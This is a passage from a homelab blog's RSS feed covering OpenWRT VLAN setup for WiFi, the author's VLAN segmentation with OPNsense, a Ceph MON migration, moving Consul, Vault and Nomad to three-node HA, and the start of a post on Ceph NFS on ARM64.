To do so, go to <em>Network</em> -&gt; <em>Interfaces</em> -&gt; <em>Devices</em> and click on the
<em>Add device configuration</em> button.</p>
<figure>
    <img loading="lazy" src="openwrt_vlan_device.png"
         alt="A screenshot of the OpenWRT device creation form. In the Device type field, VLAN (802.1Q) is set. Base device is set to eth0 and VLAN ID is set to 12, with Device name set to eth0.12."/> 
</figure>

<p>The device type is an 802.1Q device again. The base device is eth0, which as
previously mentioned is the CPU side, internal port on the AP. The VLAN ID is
&ldquo;12&rdquo;, just for illustrative purposes. The <em>Device name</em> field is filled out
automatically when the VLAN ID is entered.</p>
<p>To connect WiFis to the VLAN, we now need to create a bridge device, which
contains both the new VLAN device and the two WiFis (I&rsquo;ve got a 2.4 GHz and a 5 GHz one).</p>
<p>This is done with the same button, only this time choosing <em>Bridge device</em> as
the type.</p>
<figure>
    <img loading="lazy" src="openwrt_bridge_device.png"
         alt="Another screenshot of the OpenWRT device creation form. The chosen Device type is now Bridge device. The device name is eth0.12 with the Bridge ports setting being eth0.86. All other fields are unset."/> 
</figure>

<p>The important config here is <em>Bridge ports</em>. This config determines which devices
are connected to this bridge. Choosing <em>eth0.86</em> here means that the VLAN device
for VLAN 86 will be part of the bridge.
The WiFis cannot be added to the bridge here.</p>
<p>The next step is creating an interface for the bridge, under <em>Network</em> -&gt; <em>Interfaces</em>.
Clicking on <em>Add new interface</em> brings up the form for creating one.</p>
<figure>
    <img loading="lazy" src="openwrt_bridge_interface.png"
         alt="The OpenWRT device addition entry mask. In the Name field, WIFILAN2 has been set. The Protocol field is set to Unmanaged, while the Device field is set to br-wifi."/> 
</figure>

<p>This is only a demonstration for adding a new device. I have set the <em>Protocol</em>
field to &ldquo;Unmanaged&rdquo; because I don&rsquo;t actually need this interface to have an IP
address and so on. The bridge is used purely for forwarding packets from the WiFis
to the rest of the network. The chosen device is the bridge created previously.</p>
<p>The final step is setting up the WiFis so they use the newly created interface.
This can be done in the <em>Network</em> -&gt; <em>Wireless</em> menu.</p>
<figure>
    <img loading="lazy" src="openwrt_wifi.png"
         alt="A cropped screenshot showing the Network field set to wifilan."/> 
</figure>

<p>Clicking on <em>Edit</em> on one of the WiFi networks, you can choose an interface in
the drop-down of the <em>Network</em> option. Choosing the previously created interface
containing the bridge with the VLAN device will connect the WiFi network to the
VLAN. With that, all packets coming from the WiFi will be tagged with the VLAN
ID, before they enter the AP&rsquo;s internal switch. This way, they cannot for example
reach the AP&rsquo;s management interface.</p>
<p>And with that, you&rsquo;ve got VLANs on your WiFi networks.</p>
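<p>For reference, the same setup can also be expressed with UCI on the OpenWRT
shell. This is only a rough sketch - the section names are made up and the exact
options depend on the OpenWRT version - but it mirrors the LuCI steps above:</p>
<pre tabindex="0"><code># VLAN device for VLAN 86 on top of the CPU port eth0
uci set network.vlan86=device
uci set network.vlan86.type='8021q'
uci set network.vlan86.ifname='eth0'
uci set network.vlan86.vid='86'
uci set network.vlan86.name='eth0.86'

# Bridge containing the VLAN device; the WiFis join it via their interface
uci set network.br_wifi=device
uci set network.br_wifi.type='bridge'
uci set network.br_wifi.name='br-wifi'
uci add_list network.br_wifi.ports='eth0.86'

# Unmanaged interface on top of the bridge, referenced by the WiFi config
uci set network.wifilan=interface
uci set network.wifilan.proto='none'
uci set network.wifilan.device='br-wifi'
uci set wireless.@wifi-iface[0].network='wifilan'

uci commit
/etc/init.d/network restart
</code></pre>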
<h1 id="my-vlan-adventure">My VLAN adventure</h1>
<p>Before closing the article, I want to speak a bit about what my VLAN implementation
looks like and provide you with the reason my services were down for an entire
day.</p>
<p>I started thinking about VLANs mostly because I read a lot of other Homelabbers
are using them. My network architecture at that point was mostly flat, with the
DMZ being the only exception. I had the DMZ machine connected to a separate port
on my firewall, with a different subnet and pretty restrictive firewall rules.
Besides that, the entire network was flat. If you were able to plug a cable into
any port or connected to my WiFi, you would have full access to everything. Of
course, all of the services were secured, and many high-value functions were additionally
restricted to only my Command and Control machine, where the software allowed IP-based
access restrictions.</p>
<p>But it still seemed a bit too open to me, especially with regards to the WiFi.</p>
<p>One of the big advantages I saw was that I could create VLANs and the accompanying
separation purely in software, without having to change the wiring.</p>
<p>I started out with my network looking something like this:</p>
<figure>
    <img loading="lazy" src="initial_state.png"
         alt="A network diagram. Showing a single machine labeled DMZ attached to the firewall. Also attached to the firewall is a switch, connected to a computer labeled Desktop, a printer and a WiFi AP. Another switch is connected to the first switch, with several computers connected to it, collectively labeled Homelab."/> 
</figure>

<p>I had three goals:</p>
<ol>
<li>Separate the WiFi from the rest of the network</li>
<li>Separate the Homelab from the rest of the network</li>
<li>Separate my printer and my DECT VOIP base station from the rest of the network</li>
</ol>
<p>I initially wanted to connect both switches to the firewall directly. My intention
was to combine the two firewall NICs into a single bridge interface. The main
reason for that was to reduce the potential bottleneck when there are machines
from different VLANs connected to the Homelab switch. In those cases, when they
wanted to talk to each other, they would need to go up to the firewall for routing
and then go down again through the same interface.</p>
<p>In the end, that plan was foiled by the fact that FreeBSD (the basis for OPNsense)
does not support putting VLANs on bridge interfaces. From what I read, that is
simply not supported by the BSD networking stack.</p>
<p>So I ended up keeping the above structure, with the Homelab switch connected
to the firewall through the other switch.</p>
<p>The first VLAN I created was the one for &ldquo;IoT&rdquo; devices. In my setup, that&rsquo;s only
my printer and a DECT (Wireless phone) base station doing VOIP for my landline
connection. I never really trusted the quality of the DECT base station&rsquo;s software
and wanted it out of my main network.</p>
<p>To that end, I started with enabling VLANs on my main switch, which is
directly connected to the firewall. This in itself did not yet block anything,
because by default, Netgear switches set all ports to be members of VLAN 1,
with a default port VLAN ID of 1 and with all ports set to untagged. So packets
were still arriving without a VLAN ID at my firewall and my hosts.</p>
<p>The next step was setting up the VLAN in OPNsense. To avoid loss of connection,
I kept my main LAN side interface, connected to the switch, without a VLAN. But
I did set up a VLAN interface for the IoT VLAN. And here is where I hit my first
real problem I had not foreseen: What IP to assign to the new interface? Because
I still wanted my IoT devices to be able to use the firewall for e.g. DHCP and
DNS. That&rsquo;s when I realized that I would still need different subnets for the
different VLANs. But in hindsight, that&rsquo;s not really a bad thing. By going with
the approach to assign each VLAN into a /24 subnet according to the VLAN ID,
I could immediately know which VLAN a packet was coming from by looking at the
source IP.
So for example, for VLAN 42, I would have the subnet 10.0.42.0/24.</p>
<p>That thought led directly to the next confusion on my part. And please note
that I wrote the above explanation on how VLANs worked only after the fact. &#x1f609;
I was thinking: Okay, now I&rsquo;m adding a VLAN on top of my LAN interface. But how
would the NIC know whether a packet needs to go to the LAN interface or the VLAN
interface?! It took me longer than I want to admit to realize that of course,
it&rsquo;s not the NIC which delivers the packet to the right interface, it&rsquo;s the
kernel. And the kernel&rsquo;s networking stack then puts it to the right interface.</p>
<p>After I realized that, I finalized the OPNsense config. But I still hadn&rsquo;t wrapped
my head around the config on the switch. How would I tell the switch to deliver
some packets untagged to the firewall (everything besides packets from the IoT
VLAN) and some packets tagged (from the IoT VLAN)? In the end of course, the
answer was pretty simple again: With 802.1Q VLANs, I can configure the port
status separately for each VLAN on the switch. So for the port going to my
firewall I configured the following:</p>
<ol>
<li>For VLAN 1 (the default VLAN), the port was untagged</li>
<li>For my IoT VLAN, the port was tagged</li>
</ol>
<p>This means that all packets coming from my IoT devices would still have their
VLAN ID when arriving at my firewall, and would get sorted to the right VLAN
interface. At the same time, the VLAN tag would be stripped out of all packets
coming from VLAN 1 (which was everything else, at this point) and hence would
arrive at my standard, old LAN interface.</p>
<p>Then I just had to setup a couple of firewall rules on the new VLAN IoT interface,
allowing outgoing traffic to the internet and nothing else.</p>
<p>And with that, I finally had found my flow. First, creating the new VLAN on
both switches. Then assigning the right ports to it, all of them in untagged
mode. Then configuring the two trunks, the one between the switches and the
one leading to the firewall, with the new VLAN in tagged mode. And then
creating the interface on the OPNsense firewall. Finally, configuring the new
VLAN&rsquo;s firewall rules, depending on what I want to use it for.</p>
<p>So what does my network look like now? I&rsquo;ve got five VLANs:</p>
<ol>
<li>The administrative VLAN. It allows access to the switches&rsquo; Web UI, the
firewall&rsquo;s Web UI and full access to all hosts in the network. Only my
desktop and my Command and Control machine are members.</li>
<li>The IoT VLAN. Members can do exactly one thing: Go out to the Internet.
And then only to certain areas, namely my ISP&rsquo;s VOIP IPs. Members are
currently my VOIP/telephony box and my printer.</li>
<li>The Homelab VLAN. Access only to the internet and each other. Still thinking
whether more segmentation makes sense somewhere here.</li>
<li>The &ldquo;General&rdquo; VLAN. Again only access to the Internet. Currently mostly used
for devices connected to my WiFi.</li>
<li>My DMZ VLAN. Even has its internet outbound connections heavily restricted.</li>
</ol>
<p>The final part was my WiFi. It was the part I was most worried about when it
came to the original flat network structure. I thought quite a lot about it. Most
of the time, only my phone and my tablet are connected there. But sometimes I
also connect my laptop, and do Homelab things with it. But I didn&rsquo;t actually
want to give WiFi connected devices too much access. I finally settled for
heavily restricted access, only to the Internet. When I need to do something
from my laptop in the Homelab, I use my VPN to connect. Same for the phone and
tablet.
I&rsquo;ve currently got a task to check whether I can configure multiple WiFis
with my AP and OpenWRT. If so, I will go with a MAC-filtered WiFi with a
bit more access for my own devices, and a guest WiFi for everybody else.</p>
<p>And that&rsquo;s it. VLANs in the Homelab! &#x1f389;</p>
<p>Subscribe to the RSS feed to get even more &ldquo;Michael writes an 18 minute article about
some Homelab stuff&rdquo; delights!</p>
]]></content:encoded>
    </item>
    <item>
      <title>Ceph MON Migration</title>
      <link>https://blog.mei-home.net/posts/ceph-mon-migration/</link>
      <pubDate>Mon, 26 Dec 2022 10:38:12 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/ceph-mon-migration/</guid>
      <description>Migrating all MON daemons in a Ceph cluster</description>
      <content:encoded><![CDATA[<p>In the course of spreading my homelab over a couple more machines, I finally
arrived at the Ceph cluster&rsquo;s MON daemons. These were running on three Ceph VMs
on my main x86 server up to now. In this post, I will describe how I moved them
to three Raspberry Pis - while the cluster was up the entire time.</p>
<p>First, a couple of considerations:</p>
<ul>
<li>MON daemons use on average about 1GB of memory in my cluster</li>
<li>My cluster, and most of my services, went down during the migration. So please
be cautious if you plan to do your own migration</li>
</ul>
<p>The MON daemons are something of a <em>control plane</em> for Ceph clusters. They hold
the cluster maps with the daemon and data locations. Every client which uses the Ceph
cluster contacts them to get a map of available OSDs to work with.</p>
<p><strong>Please Note:</strong> Be cautious with this! If you lose all three of your Monitors,
your cluster is broken.</p>
<p>Due to the centrality of the MON daemons for both the cluster itself and any
clients, a lot of places potentially hold the IPs of your monitors. Most of the
time, that will be in the form of <code>ceph.conf</code> files.</p>
<p><strong>Clients generally do not receive new MON addresses automatically. They will
need to be updated manually!</strong></p>
<p>So how did I do it all? I started out with migrating a single daemon. My thinking
here: I can migrate one daemon, then update all three MONs&rsquo; addresses to their
new values everywhere, and then I can migrate the other two daemons as well.</p>
<p>For the sake of this article, let&rsquo;s assume that the old MONs are located on
<code>oldhost1,oldhost2,oldhost3</code> and the new hosts are called <code>newhost1,newhost2,newhost3</code>.</p>
<p>Also note that I&rsquo;m running a <code>cephadm</code> cluster.</p>
<p>So to begin with, a single daemon can be migrated by using the <code>ceph orch apply</code>
command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph orch apply mon --placement <span style="color:#e6db74">&#34;newhost1,oldhost1,oldhost2&#34;</span>
</span></span></code></pre></div><p>This will disable the MON on <code>oldhost3</code> and place a fresh one on
<code>newhost1</code>.
The MON daemons on <code>oldhost1</code> and <code>oldhost2</code> will not be touched at all and
continue running.</p>
<p>At this point, nothing much can go wrong in cluster operations. Any connected
clients will automatically go searching for another MON daemon and find either
<code>oldhost1</code> or <code>oldhost2</code>. But note: Those clients will not automagically get the
IP of <code>newhost1</code> added to their potential MONs. Many parts of the cluster,
including the MON daemons on <code>oldhost1</code> and <code>oldhost2</code>, will be informed about
the new MON daemon.
But other parts of the cluster will not. Among the daemons which will not
automatically get the new MON address are the OSDs and NFS daemons.</p>
<p>At this point, I was not aware that there is any kind of problem.</p>
<p>I then adapted all of the <code>ceph.conf</code> files and other places where the MON IPs
are mentioned. These were:</p>
<ul>
<li>Ceph CSI jobs running in my Nomad cluster</li>
<li><code>ceph.conf</code> files on a number of unmanaged physical hosts</li>
<li>The kernel command lines of my netbooting hosts, which contain the MONs</li>
</ul>
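<p>For the <code>ceph.conf</code> files on the unmanaged hosts just mentioned, the change
itself is only the <code>mon_host</code> line. A minimal sketch, using the example hostnames
from above (your file will contain the real IPs or hostnames and your cluster&rsquo;s fsid):</p>
<pre tabindex="0"><code>[global]
        fsid = &lt;your cluster id&gt;
        mon_host = newhost1,newhost2,newhost3
</code></pre>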
<p>This was where I diverged from my original plan. Instead of just replacing the
IP of <code>oldhost3</code> with the one of <code>newhost1</code>, I went ahead and replaced all of them.</p>
<p>And here&rsquo;s where the problems started. During reboots, my OSDs suddenly were no
longer recognized in the <code>ceph -s</code> output. They were down, even though I could
see that they were up and running on their respective hosts.</p>
<p>The reason for this: The OSDs do not seem to be updated with new MON addresses
automatically, and they also ignore their host&rsquo;s <code>ceph.conf</code> file.
Instead, they have their own conf file, located at <code>/var/lib/ceph/CLUSTER_ID/OSD_NAME/config</code>.
The <code>CLUSTER_ID</code> here is the <code>id:</code> line in the <code>ceph -s</code> output and <code>OSD_NAME</code> is
for example <code>osd.1</code>. That file seems to be a <code>ceph.conf</code> file used by the OSDs.
Just manually changing the MON addresses in there and restarting the daemons
fixed the issue.</p>
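<p>In practice, the fix looked roughly like this on each OSD host (cluster ID, OSD
name and the cephadm-style systemd unit name are examples; adjust them to your setup):</p>
<pre tabindex="0"><code># edit the mon_host line in the OSD&#39;s own config
vi /var/lib/ceph/&lt;CLUSTER_ID&gt;/osd.1/config

# restart the containerized OSD via its cephadm systemd unit
systemctl restart ceph-&lt;CLUSTER_ID&gt;@osd.1.service
</code></pre>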
<p>I also observed that the NFS daemon I had running did not seem to be working
anymore. It had the same problem and the same solution worked.</p>
<p>A final comment on performance: It seems that Raspberry Pis manage the load
of MON daemons just fine. I&rsquo;ve got three of them hosting the MONs now, and they
are also running Nomad, Consul and Vault servers. The CPU utilization seldom
goes above 10%.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Migrating to 3-node HA for Consul/Vault/Nomad</title>
      <link>https://blog.mei-home.net/posts/ha-nomad-stack/</link>
      <pubDate>Sun, 25 Dec 2022 22:32:44 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/ha-nomad-stack/</guid>
      <description>Migrating from a single server instance to HA with three instances for HashiCorp Vault/Nomad/Consul on Raspberry Pis</description>
      <content:encoded><![CDATA[<p>As mentioned in my previous post <a href="https://blog.mei-home.net/posts/cluster_controller_migration/">on migrating the Consul/Vault/Nomad</a>
servers from a VM to a Raspberry Pi,
I was still waiting for some more Pis to arrive to extend the Nomad/Consul/Vault
clusters to a HA configuration for all three. The main reason for this is not
necessarily fault tolerance, but rather gaining the ability to restart the
controllers without taking down the entire Nomad cluster.</p>
<p>Now I&rsquo;d like to give a short overview of the experience, and end with a bit of
an overview on the resource consumption (spoiler: Raspberry Pi 4 4GB are
absolutely sufficient).</p>
<p>The sections on Nomad and Consul are going to be pretty short, as both ran
fine and needed few adaptations to the configs. The Vault section is going to be
the really interesting one.</p>
<p>On the order of doing the extension: I started out with Consul, because both
Nomad and Vault can use Consul to discover other servers in the cluster. Plus,
I&rsquo;m using the Vault/Nomad Consul service discovery entries in a number of places,
so having new Nomad/Vault server instances register themselves with Consul right
off the bat was necessary.</p>
<p>One important note: Before launching this action, make sure that all access to
your servers goes through some sort of load balancing, not through the DNS name
or IP of your single server.
I&rsquo;m using Consul for this, accessing Nomad via <code>nomad.service.consul</code>, Consul
itself through <code>consul.service.consul</code> and Vault via <code>vault.service.consul</code>.</p>
<p>I have not actually tested what happens when you just point your server access
to a single controller. For Vault, <a href="https://developer.hashicorp.com/vault/docs/concepts/ha#request-forwarding">going by the docs</a>,
this should work out of the box, because standby servers forward requests to
the current master. But I do not know how exactly this works for Nomad or Consul.</p>
<h2 id="consul">Consul</h2>
<p>For Consul to go HA, the changes were minimal. I made two changes in my server
config files on all three nodes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>retry_join <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;controller1&#34;, &#34;controller2&#34;, &#34;controller3&#34;</span>]
</span></span><span style="display:flex;"><span>bootstrap_expect <span style="color:#f92672">=</span> <span style="color:#ae81ff">3</span>
</span></span></code></pre></div><p>The first line provides the three controllers&rsquo; DNS names, so that each newly
starting server knows which hosts to connect to.</p>
<p>The second line expands the bootstrapping to three servers. Previously, this
was set to <code>1</code>. It ensures that after a complete cluster outage, the three
server instances wait until all three are in contact before starting to service
requests.</p>
<p>Afterwards, it was just a simple <code>systemctl start consul.service</code>, and the
two new controller nodes automatically got the cluster state from the one already
running instance and then started running normally:</p>
<pre tabindex="0"><code>2022-12-14T22:39:13.376+0100 [INFO]  agent: Synced node info
2022-12-14T22:39:13.037+0100 [INFO]  agent.server.raft: Installed remote snapshot
2022-12-14T22:39:13.036+0100 [INFO]  agent.server.raft: snapshot restore progress: id=138-28922885-1671053952962 last-index=28922885 last-term=138 size-in-bytes=281985 read-bytes=281985 percent-complete=100.00%
2022-12-14T22:39:12.979+0100 [INFO]  agent.server.raft: copied to local snapshot: bytes=281985
2022-12-14T22:39:12.971+0100 [INFO]  agent.server.raft: snapshot network transfer progress: read-bytes=281985 percent-complete=100.00%
2022-12-14T22:39:12.969+0100 [INFO]  agent: Join cluster completed. Synced with initial agents: cluster=LAN num_agents=3
</code></pre><p>And that&rsquo;s it. If, for whatever reason, all three controllers are not available
when the cluster is started cold, just reduce <code>bootstrap_expect</code> to <code>1</code>.</p>
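<p>To verify that all three servers actually formed a cluster, two standard Consul
CLI commands are useful:</p>
<pre tabindex="0"><code># all agents, servers and clients, with their status
consul members

# the raft peer set - should list all three servers, one of them as leader
consul operator raft list-peers
</code></pre>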
<p>There are two additional important points to take into consideration. First,
if you&rsquo;re using Consul&rsquo;s DNS service discovery, make sure that your DNS is
configured to take all three Consul server instances into account. I&rsquo;m currently
running <a href="https://www.powerdns.com/">PowerDNS</a>, using the <a href="https://docs.powerdns.com/recursor/settings.html#forward-zones-recurse">forward-zones-recurse</a>
config with the <code>consul</code> domain. But in the future, I plan to just launch a
local Consul agent on my DNS machine and point the PowerDNS recursor to it.
Second, also make sure that your Consul servers are listening locally, and that
your Vault and Nomad servers do not do their Consul registration on <code>consul.service.consul</code>.
This would work fine with a single instance. But with multiple instances, you
might end up with multiple registrations for e.g. <code>vault.service.consul</code>, as
the <code>consul.service.consul</code> domain always returns all three Consul servers. So
it is random where e.g. Nomad registers its service - and it is similarly random
where Nomad tries to deregister the service!
Instead, best practice is to always do the service registration against the local
Consul agent - be that a client or a server.</p>
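<p>For Nomad, registering against the local agent boils down to pointing its
<code>consul</code> block at localhost. A minimal sketch, assuming Consul&rsquo;s HTTPS interface
on port 8501 like in my setup (the token is a placeholder):</p>
<pre tabindex="0"><code>consul {
  address = &#34;127.0.0.1:8501&#34;
  ssl     = true
  token   = &#34;your consul token here&#34;
}
</code></pre>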
<h2 id="nomad">Nomad</h2>
<p>For Nomad, enabling HA is even simpler. I only needed to up the <code>bootstrap_expect</code>
setting to <code>3</code> and start up the additional Nomad server instances. No other
changes were necessary, because Nomad uses Consul for server discovery.</p>
<p>If you do not have Consul set up, you will have to add all of your Nomad servers
to the <code>retry_join</code> config option. This has to happen in both your server configs
and your client configs!</p>
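<p>A minimal sketch of what that could look like without Consul (hostnames are
examples; for clients, a static <code>servers</code> list works as well):</p>
<pre tabindex="0"><code># server config
server {
  enabled          = true
  bootstrap_expect = 3
  server_join {
    retry_join = [&#34;controller1&#34;, &#34;controller2&#34;, &#34;controller3&#34;]
  }
}

# client config
client {
  enabled = true
  servers = [&#34;controller1&#34;, &#34;controller2&#34;, &#34;controller3&#34;]
}
</code></pre>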
<h2 id="vault">Vault</h2>
<p>Vault is the most complicated migration of the bunch. This is mostly due to the
fact that I started out using the simple <code>file</code> backend. This backend does not
support Vault&rsquo;s HA functionality. When choosing a backend, you can check
<a href="https://developer.hashicorp.com/vault/docs/configuration/storage">the Vault documentation</a>
for the different backends.</p>
<p>Because my backend does not support Vault HA, I first had to do a Vault backend
migration. This is an officially supported process for switching backends.
The docs can be found <a href="https://developer.hashicorp.com/vault/docs/commands/operator/migrate#operator-migrate">here</a>.</p>
<p>I decided to switch to the <a href="https://developer.hashicorp.com/vault/docs/configuration/storage/raft">Vault integrated backend</a>,
as it is officially supported by HashiCorp and proposed as the default backend
for HA.
One important <em>note</em> on the Integrated backend: Even though it is based on the
raft consensus protocol, it also works with a single node. So you don&rsquo;t have to
worry about switching backends and having to enable HA right away.</p>
<p>The <code>vault operator migrate</code> command uses a special configuration file to
facilitate the migration. Because I was switching from the <a href="https://developer.hashicorp.com/vault/docs/configuration/storage/filesystem">file backend</a>
to the integrated backend, my file looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">storage_source</span> <span style="color:#e6db74">&#34;file&#34;</span> {
</span></span><span style="display:flex;"><span>   path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault_storage&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">storage_destination</span> <span style="color:#e6db74">&#34;raft&#34;</span> {
</span></span><span style="display:flex;"><span>  path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/new_vault_storage&#34;</span>
</span></span><span style="display:flex;"><span>  node_id <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;controller1&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>cluster_addr <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://controller1:8201&#34;</span>
</span></span></code></pre></div><p>The <code>node_id</code> config option is optional, and should be unique for each server
instance. I ensured this by using each server host&rsquo;s hostname. The <code>cluster_addr</code>
also needs to be set to the address under which the local server&rsquo;s cluster
port (8201 in the config above) can be reached. Again, this is just the hostname for me.
Two important points to note:</p>
<ol>
<li>The Vault server should be taken offline during the migration</li>
<li>The migration does not automatically create the <code>path</code> directory. It needs
to be created manually.</li>
</ol>
<p>Once the config file is created, all directories are created and the server has
been stopped, execute the migration command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault operator migrate -config /path/to/migration/config.hcl
</span></span></code></pre></div><p>Before restarting the server now, you need to make sure to also adapt the server&rsquo;s
config file. I removed the <code>storage &quot;file&quot;</code> section from mine, and added the
following:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">storage</span> <span style="color:#e6db74">&#34;raft&#34;</span> {
</span></span><span style="display:flex;"><span>  path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault_data&#34;</span>
</span></span><span style="display:flex;"><span>  node_id <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;controller1&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">retry_join</span> {
</span></span><span style="display:flex;"><span>    leader_api_addr <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://controller1:8200&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">retry_join</span> {
</span></span><span style="display:flex;"><span>    leader_api_addr <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://controller2:8200&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">retry_join</span> {
</span></span><span style="display:flex;"><span>    leader_api_addr <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://controller3:8200&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>disable_mlock <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>As you might note, there is no <code>bootstrap_expect</code> config this time. But the
raft storage backend (which is just another name for the &ldquo;Vault integrated storage&rdquo;)
requires setting <code>retry_join</code> instead. I just hardcoded my three servers here, but
other mechanisms, including some cloud providers&rsquo; APIs, are also supported.
Setting <code>disable_mlock</code> is recommended when using the <code>raft</code> backend.</p>
<p>After that, I just restarted the currently still single server instance, which
went through without a problem. Don&rsquo;t forget to also unseal it at this point!</p>
<p>Then I went forward and configured the two other Vault servers. Remember to adapt
the <code>node_id</code> config option for each server instance.</p>
<p>After launching the other two servers, I was greeted with a lot of error
messages along these lines:</p>
<pre tabindex="0"><code>Vault is sealed
</code></pre><p>In HA Vault, each server instance still needs to be unsealed individually. Just
running <code>operator unseal</code> on the currently active Vault server is not enough.
There is an <a href="https://developer.hashicorp.com/vault/tutorials/auto-unseal">auto-unseal feature</a>,
but it requires additional components and is geared more towards large scale
setups on one of the hyperscalers&rsquo; clouds.</p>
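<p>Unsealing the standbys is just a matter of pointing the CLI at each instance in
turn (hostnames are examples):</p>
<pre tabindex="0"><code>export VAULT_ADDR=https://controller2:8200
vault operator unseal    # repeat until enough key shares have been entered

export VAULT_ADDR=https://controller3:8200
vault operator unseal
</code></pre>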
<p>Once I unsealed all three servers, Vault got up and running properly without
further problems.</p>
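<p>With the integrated storage backend, the raft membership can also be checked
directly, which is a nice sanity check after unsealing everything:</p>
<pre tabindex="0"><code>vault operator raft list-peers
</code></pre>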
<p>In addition to the above, I also started to make use of Vault&rsquo;s Consul service
registration. The docs can be found <a href="https://developer.hashicorp.com/vault/docs/configuration/service-registration/consul">here</a>.
For some reason, this functionality is only available with an HA-capable backend.
With it configured, I no longer needed my homemade Vault service config file,
which I fed to Consul.
The config looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">service_registration</span> <span style="color:#e6db74">&#34;consul&#34;</span> {
</span></span><span style="display:flex;"><span>  address <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;127.0.0.1:8501&#34;</span>
</span></span><span style="display:flex;"><span>  token <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;your consul token here&#34;</span>
</span></span><span style="display:flex;"><span>  scheme <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The important point here is to use the local Consul agent. Do not use Consul&rsquo;s
DNS service discovery via <code>consul.service.consul</code>, because that returns all
Consul servers, meaning that the Vault instance might register with one Consul
server, but try to deregister from another. This will leave behind stale Vault
service registrations.</p>
<h2 id="performance">Performance</h2>
<p>Finally, a short word on resource utilization: HA carries some costs with it.
I&rsquo;m running the Vault/Nomad/Consul servers on three Raspberry Pis. The total
CPU consumption after enabling HA for the three servers increased by 1-2%. Not
too significant, but measurable.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Ceph NFS on ARM64: Not currently possible</title>
      <link>https://blog.mei-home.net/posts/ceph_nfs_arm64/</link>
      <pubDate>Wed, 21 Dec 2022 16:47:27 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/ceph_nfs_arm64/</guid>
      <description>Running Ceph&amp;#39;s NFS component on ARM64 is currently impossible due to missing ganesha packages for ARM64</description>
      <content:encoded><![CDATA[<p>Today, I wanted to migrate my single Ceph NFS daemon from my LXD VM on an x86
server to my Hardkernel H3. This did not work out too well.
Yesterday, I had finally finished the migration of my Ceph cluster&rsquo;s MON daemons
to my three Raspberry Pi controllers. This move had its own problems, which I
will detail a bit in another blog entry.
Part of this migration was to also move over the MGR daemons to my Pis. This
actually worked without any problem - I thought.</p>
<p>Ceph&rsquo;s <a href="https://docs.ceph.com/en/latest/mgr/">MGR daemon</a> serves a number of
functions related to managing a Ceph cluster. It provides the rather nicely made
Ceph Dashboard, for example. Its most important task though is controlling the
<a href="https://docs.ceph.com/en/latest/mgr/orchestrator/">Orchestrator</a> accessible
with the <code>ceph orch</code> CLI interface. Of particular interest for this post though
is the <code>ceph nfs</code> <a href="https://docs.ceph.com/en/latest/mgr/nfs/">NFS module</a>.
This module allows a user to run one or more NFS servers backed
by S3 buckets or CephFS volumes. In my setup, I&rsquo;m using this functionality to
have an NFS export which houses the <code>/boot</code> partitions of my netbooting machines.
For details of my setup, have a look at <a href="https://blog.mei-home.net/posts/rpi-netboot/netboot-server/#nfs-boot-dir">this previous post</a>.</p>
<p>So now what happened today? I wanted to migrate my NFS daemon from the VM it was
running on to my Hardkernel H3.</p>
<p>First step: Adding a second NFS daemon on the new host, while leaving the old
daemon untouched:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph orch apply nfs my-nfs --placement <span style="color:#e6db74">&#34;newhost,oldhost&#34;</span>
</span></span></code></pre></div><p>The result of this was an error message along these lines:</p>
